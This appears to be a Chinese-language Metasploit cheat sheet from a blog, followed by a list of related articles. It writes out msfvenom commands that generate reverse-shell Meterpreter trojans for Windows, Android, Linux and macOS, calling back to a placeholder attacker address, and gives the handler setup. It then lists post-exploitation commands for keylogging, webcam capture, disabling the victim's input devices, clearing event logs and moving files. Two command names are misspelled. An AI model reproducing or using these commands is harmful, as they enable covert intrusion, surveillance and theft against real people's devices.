Metasploit使用教程

简介: msfconsole

msfconsole

   \   ,__,
    \  (oo)____
       (__)    )\
          ||--|| *

生成木马

  • windows

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f exe -o xxx.exe
    
  • Android

    msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxxx -o xxx.apk
    
  • linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f elf > xxx.elf
    
  • Mac

    msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f macho > xxx.macho
    

连接会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.xxx.xxx

set lport xxxx

exploit

常用命令

uictl disable mouse
# 禁用鼠标
uictl disable keyboard
# 禁用键盘
uictl enable mouse
# 开启鼠标
uictl enable keyboard
# 开启键盘
keyscan_start
# 开启键盘记录
kayscan_stop
# 停止键盘记录
keyscan_dump
# 导出键盘记录数据

webcam_list
# 查看摄像头设备
webcam_snap
# 拍照
webcam_stream
# 开启视频

excture 
# 执行目标文件

clearev
# 清理日志

upload
# 上传文件
download
# 下载文件

screenshot
# 截屏
sysinfo
# 系统信息
shutdown
# 关机
相关文章
|
8月前
|
安全 Linux 测试技术
1.1 Metasploit 工具简介
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
150 1
|
SQL Web App开发 网络安全
渗透测试-浏览器插件-Hackbar的安装与使用教程
渗透测试-浏览器插件-Hackbar的安装与使用教程
渗透测试-浏览器插件-Hackbar的安装与使用教程
|
安全 关系型数据库 MySQL
Phpstudy简介与使用教程
Phpstudy简介与使用教程
Phpstudy简介与使用教程
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
|
网络协议 安全 开发工具
Metasploit的基本使用
参考文献:https://www.cnblogs.com/Acewipe/p/7672446.html 环境: ubuntu Metasploit简介: Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞。
1546 0
|
数据采集 监控 前端开发
使用手册
一、Gecco是什么 Gecco是一款用java语言开发的轻量化的易用的网络爬虫,不同于Nutch这样的面向搜索引擎的通用爬虫,Gecco是面向主题的爬虫。
1672 0
|
测试技术
Appscan工具之使用教程
接着上一篇文章,继续学习appscan软件的操作 一、设置配置向导 1.启动软件进入主界面—>选择创建新的扫描: 创建扫描 2.在弹出的新建扫描对话框中选择常规扫描 常规扫描 3.
3147 0
|
网络虚拟化 网络架构 iOS开发